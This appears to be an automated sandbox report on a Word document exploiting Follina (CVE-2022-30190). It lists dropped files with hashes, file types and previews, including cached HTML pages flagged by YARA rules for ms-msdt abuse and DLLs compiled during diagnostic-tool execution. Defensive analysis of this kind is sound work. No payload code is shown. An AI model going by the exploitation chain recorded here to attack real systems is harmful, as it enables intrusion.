                                                                                                                                                                            Preview:C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                            Entropy (8bit):1.3860360556164644
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:ulXHaV:uNu
                                                                                                                                                                            MD5:334DB8E86457CD1A976CA2A0E56AB93C
                                                                                                                                                                            SHA1:533C32C7E721C1742FBBEA46D50B4EC6BDA19733
                                                                                                                                                                            SHA-256:4FB2CE4D568A646BE624CFD303E2B09958AC724B3C78FC5F88D36D2781F19F38
                                                                                                                                                                            SHA-512:19178D6A265883E64F27A189A7E1E1A64ABFE57485E06DC3A28C0BD3AD41A8D2921ECA4478B95F97AA47D04C7F61F1AD08F24D002826C718AE1CB73A596BBF67
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:642294. Admin.

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\9E3C1D92-05B7-4098-84A1-16DB3C984217

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):147863
                                                                                                                                                                            Entropy (8bit):5.358968341475212
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:jcQW/gxgB5BQguw//Q9DQW+zQWk4F77nXmvidQXxUETLKz6e:6HQ9DQW+zIXLI
                                                                                                                                                                            MD5:22DC37BD9827F0F05F504ADBE67007D1
                                                                                                                                                                            SHA1:3200F0F1E2A190F3A906C1A2A1119C3E36272560
                                                                                                                                                                            SHA-256:0CBB981F4187FA754C92D82B560F24AF441558066D7FE647DE005C933001D7CF
                                                                                                                                                                            SHA-512:3FEEAA1E468E6DC4A955D17722089407EC34BAADC1D60616D0B90468983E707FB3CB7F64D7E9873319C457C2C5BC9A801A14B412103E1B0A846DD5179CCCDF56
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-06-07T15:39:56">.. Build: 16.0.15330.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1FD46902.htm

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):5889
                                                                                                                                                                            Entropy (8bit):4.705994860110501
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gR:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKio
                                                                                                                                                                            MD5:EA48F95AB4F3CA3B0C687A726CB00C49
                                                                                                                                                                            SHA1:C473DB9C4D460D3F7801B506F289C04A04D3A50F
                                                                                                                                                                            SHA-256:CDEC208EC12FA58C122DB1887ABB7F58C7998A9BA6EEEBFFC501E11DE3975215
                                                                                                                                                                            SHA-512:394E847B28549EF616F9CD1CA613B20BB318194A3A6B749A8156319A9CBFAC35CC0C44251A3CCBC14ECB7CF79F86816C7BB971DA5719D1FB8E1E51581F964470
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Yara Hits:
                                                                                                                                                                            • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1FD46902.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1FD46902.htm, Author: Joe Security
                                                                                                                                                                            Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7F7F7060.htm

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):5889
                                                                                                                                                                            Entropy (8bit):4.705994860110501
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gR:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKio
                                                                                                                                                                            MD5:EA48F95AB4F3CA3B0C687A726CB00C49
                                                                                                                                                                            SHA1:C473DB9C4D460D3F7801B506F289C04A04D3A50F
                                                                                                                                                                            SHA-256:CDEC208EC12FA58C122DB1887ABB7F58C7998A9BA6EEEBFFC501E11DE3975215
                                                                                                                                                                            SHA-512:394E847B28549EF616F9CD1CA613B20BB318194A3A6B749A8156319A9CBFAC35CC0C44251A3CCBC14ECB7CF79F86816C7BB971DA5719D1FB8E1E51581F964470
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Yara Hits:
                                                                                                                                                                            • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7F7F7060.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7F7F7060.htm, Author: Joe Security
                                                                                                                                                                            Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{99114F2D-2DF9-4F1D-B87F-44944CA06DB2}.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2130
                                                                                                                                                                            Entropy (8bit):1.1445888158572237
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:/9IqgHu42sarhYkIuvgB4PxZUtr1iI5lN24NLRUlQ/lfEz/RUlQ/lflKDmPm1SX7:mbb2sOhYk5vnZABylAlY/ylAldIQ5
                                                                                                                                                                            MD5:CB0C468E9D00224731A0494B8123745C
                                                                                                                                                                            SHA1:738594A3EB858A1304DFD02265CD9AFC0BE694E0
                                                                                                                                                                            SHA-256:A7B0CDD9C0B709F34CEC39E2509F16DEC6651ED2C3E3B9675854F2E78E506F55
                                                                                                                                                                            SHA-512:C45B702DADD517480D71D8D78973C1DB13D3F93A4F204F188101F0D399422248360B22F448DDB859C4F5DE3A16E6FB3B6BBDEF265624FC7935F9C206470C9C7F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:....S.H.A.P.E. .X. .\.*. .M.E.R.G.E.F.O.R.M.A.T... . ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................0...2...6...D...F...D...F...J...N...P.............................................................................................................................................................................................................................................................................................................................................................................................................................j....U....j....U...*....j....U

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{A345A8D3-6E8D-49C9-8771-EB1B48968C6A}.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1024
                                                                                                                                                                            Entropy (8bit):0.05390218305374581
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):5889
                                                                                                                                                                            Entropy (8bit):4.705994860110501
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gR:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKio
                                                                                                                                                                            MD5:EA48F95AB4F3CA3B0C687A726CB00C49
                                                                                                                                                                            SHA1:C473DB9C4D460D3F7801B506F289C04A04D3A50F
                                                                                                                                                                            SHA-256:CDEC208EC12FA58C122DB1887ABB7F58C7998A9BA6EEEBFFC501E11DE3975215
                                                                                                                                                                            SHA-512:394E847B28549EF616F9CD1CA613B20BB318194A3A6B749A8156319A9CBFAC35CC0C44251A3CCBC14ECB7CF79F86816C7BB971DA5719D1FB8E1E51581F964470
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Yara Hits:
                                                                                                                                                                            • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES, Author: Joe Security
                                                                                                                                                                            Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].htm (copy)

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):5889
                                                                                                                                                                            Entropy (8bit):4.705994860110501
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gR:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKio
                                                                                                                                                                            MD5:EA48F95AB4F3CA3B0C687A726CB00C49
                                                                                                                                                                            SHA1:C473DB9C4D460D3F7801B506F289C04A04D3A50F
                                                                                                                                                                            SHA-256:CDEC208EC12FA58C122DB1887ABB7F58C7998A9BA6EEEBFFC501E11DE3975215
                                                                                                                                                                            SHA-512:394E847B28549EF616F9CD1CA613B20BB318194A3A6B749A8156319A9CBFAC35CC0C44251A3CCBC14ECB7CF79F86816C7BB971DA5719D1FB8E1E51581F964470
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\RES374A.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b2, 9 symbols
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1368
                                                                                                                                                                            Entropy (8bit):4.108156724577044
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:HTi3W9olAg9NqXgHOFhKdofeI+ycuZhNsvakSHIPNnq9Yld:Q/T+XguzKum1ul8a3Qq9YP
                                                                                                                                                                            MD5:46E1987205445B6455828795311B41F1
                                                                                                                                                                            SHA1:67399B55265526324775B02D77CE67910F00CC02
                                                                                                                                                                            SHA-256:277C0BA9EF14053CE547B95F1ACF8BE4BB96F4B56FE2B5B5302398B4EC91BD33
                                                                                                                                                                            SHA-512:15082D856FFA14B677932F7F1856D08EDBFF3BC4BB5766FE9427B7BF2499257AEDF4C6967AE132B550233455131C4E412FB44609D6C68113A421308E2F46D507
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:L.....b.............debug$S........t...................@..B.rsrc$01........X.......X...........@..@.rsrc$02........P...b...............@..@........U....c:\Users\user\AppData\Local\Temp\qe5jzpda\CSC4563D2ED18334995B732DDC516AA1E81.TMP.......................@.<.B.:L..........5.......C:\Users\user\AppData\Local\Temp\RES374A.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.e.5.j.z.p.d.a...d.l.l.....(.....L.e.g.a.l.C.

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\RES4C97.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b2, 9 symbols
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1368
                                                                                                                                                                            Entropy (8bit):4.1016590014719485
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:Hii3W9ohbKZqH5qhKdofeI+ycuZhNEakSQPNnq9Yld:T/0sZAKum1ulEa3Iq9YP
                                                                                                                                                                            MD5:5138C19164E397DB350D16515434E5CF
                                                                                                                                                                            SHA1:9946106498C217FA887CC1982CC1D4DE3067075A
                                                                                                                                                                            SHA-256:C77A4D04F1502A89AE9E6DB47DEB005131A537A87EDAE6C3EF77ACE22C87E153
                                                                                                                                                                            SHA-512:B5C8959E8929CED41FD39142B476C24CEC1E04AE279D6A4292615756482AC7D95368351C83E7D0432ABD0042FB0362E5F0621D1D06EE27D97B8D95DF2B1C4067
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:L.....b.............debug$S........t...................@..B.rsrc$01........X.......X...........@..@.rsrc$02........P...b...............@..@........U....c:\Users\user\AppData\Local\Temp\xwo13jpt\CSC9D13466D68BE46EAAB5DAAD8B4EDFE4C.TMP...................9.kl`...................5.......C:\Users\user\AppData\Local\Temp\RES4C97.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.w.o.1.3.j.p.t...d.l.l.....(.....L.e.g.a.l.C.

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\RESB3CD.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b2, 9 symbols
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1368
                                                                                                                                                                            Entropy (8bit):4.068529171891967
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:Hzi3W9oPV5RHRhKdofeI+ycuZhNIakS0PNnq9Yld:w/d5R/Kum1ulIa3Uq9YP
                                                                                                                                                                            MD5:7F5D98DD1616DAAE5FDB4B3B64239B5C
                                                                                                                                                                            SHA1:02C3617D9FA457D86A4217B5E2416C37ED41EAF5
                                                                                                                                                                            SHA-256:F039719B65593874A1C215DA4D0A258EA002B82F3C2505F9207200008107482D
                                                                                                                                                                            SHA-512:0E6B0E7CDDDCEEF93AD0490AB60350611B5E193495B1C0A5D670C88A2B346B6ECC75755D438E7CB954F03FE5F75542BF056CE87032BB8272F68A87B884AC9DBA
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:L.../.b.............debug$S........t...................@..B.rsrc$01........X.......X...........@..@.rsrc$02........P...b...............@..@........U....c:\Users\user\AppData\Local\Temp\ddzr0cba\CSC44E4BCADDF3245FBA3B96135AF703040.TMP..................$t..B...3L(..#-...........5.......C:\Users\user\AppData\Local\Temp\RESB3CD.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.d.z.r.0.c.b.a...d.l.l.....(.....L.e.g.a.l.C.

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\ddzr0cba\CSC44E4BCADDF3245FBA3B96135AF703040.TMP

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                            Entropy (8bit):3.0841041192668177
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryGak7Ynqq0PN5Dlq5J:+RI+ycuZhNIakS0PNnqX
                                                                                                                                                                            MD5:2474FFB442AB88F7334C28AC94232DEA
                                                                                                                                                                            SHA1:29AFF176603EF2403223790DAEADD51F5C6A2D39
                                                                                                                                                                            SHA-256:2AB2047A7A0AEB12410062F5671938A0B649CB2337F1D7B460494DBFA0547E15
                                                                                                                                                                            SHA-512:4B3318A70ED2E6549FDA5E4EB394235A672CAC8AFF5C77062585F099562DAB9F3C92AD860A53F6DB41ABB54D9E27D95F1853AF164369ACC2D873DA3188B22CB0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.d.z.r.0.c.b.a...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.d.z.r.0.c.b.a...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\ddzr0cba\ddzr0cba.dll

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):9728
                                                                                                                                                                            Entropy (8bit):4.794249848380279
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:/KqedmYoNKvUTCSH3gR8H8FgwSHwBhkwZYPaSJ365OkieMjQZaKRnIj2K:CElNK8TCSfHyPhkwZ+vKOTQZjnG
                                                                                                                                                                            MD5:6EE340A48A9C20B04134413E2268DEBB
                                                                                                                                                                            SHA1:7BC0B902D3D681BD297648D75B8F0CD99AEAC79E
                                                                                                                                                                            SHA-256:6AA73DCC1D35D9CAEA2860D83BF96CFAE393A7D532A17AA984841F29A149BE87
                                                                                                                                                                            SHA-512:8EC9551012B64375E2E932E6776F281F9D8D8BFC0C2848994F44906AAA864FD159D2A1996E3CFC6E36D7120052013A760D2C8879D0819EBCB75C388DF82747BC
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!................^<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B................@<......H........$..4............................................................0..%....... ....s.....r...p.(....,..o....*~....*....0..!....... ....s.......(....,..o....*~....*....0...........(....s......o.........o....*....0..@....... ....s..... ....s........(....s.......o....o....&..o....o....&.*.0...........,.. .+.....o.....+).o......t....~....(....,...t.......(....&.o....-....u........,...o......o......+*..o......t....~....(....,...t.......(....&..o....-.....u........,...o.....*

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\qe5jzpda\CSC4563D2ED18334995B732DDC516AA1E81.TMP

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                            Entropy (8bit):3.1133460136408515
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryavak7YnqqHIPN5Dlq5J:+RI+ycuZhNsvakSHIPNnqX
                                                                                                                                                                            MD5:FDB2ACD68AA940F09F3CD89842A03A4C
                                                                                                                                                                            SHA1:5A068F249C632673E9743DE0119B3D5FD3EB5968
                                                                                                                                                                            SHA-256:C0AE37245612C506864EFEA4661F111B941699E49702EA0A8CF2CA30CA7A2996
                                                                                                                                                                            SHA-512:18F32180C319BA0280B15B36BE7EC8A9326BD9572CDDE223A9D7A01DA48074B672C25E250B6AFF90FD8899950A221D46F5E06F4956EE564392065BECDF0CCC2B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.e.5.j.z.p.d.a...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...q.e.5.j.z.p.d.a...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

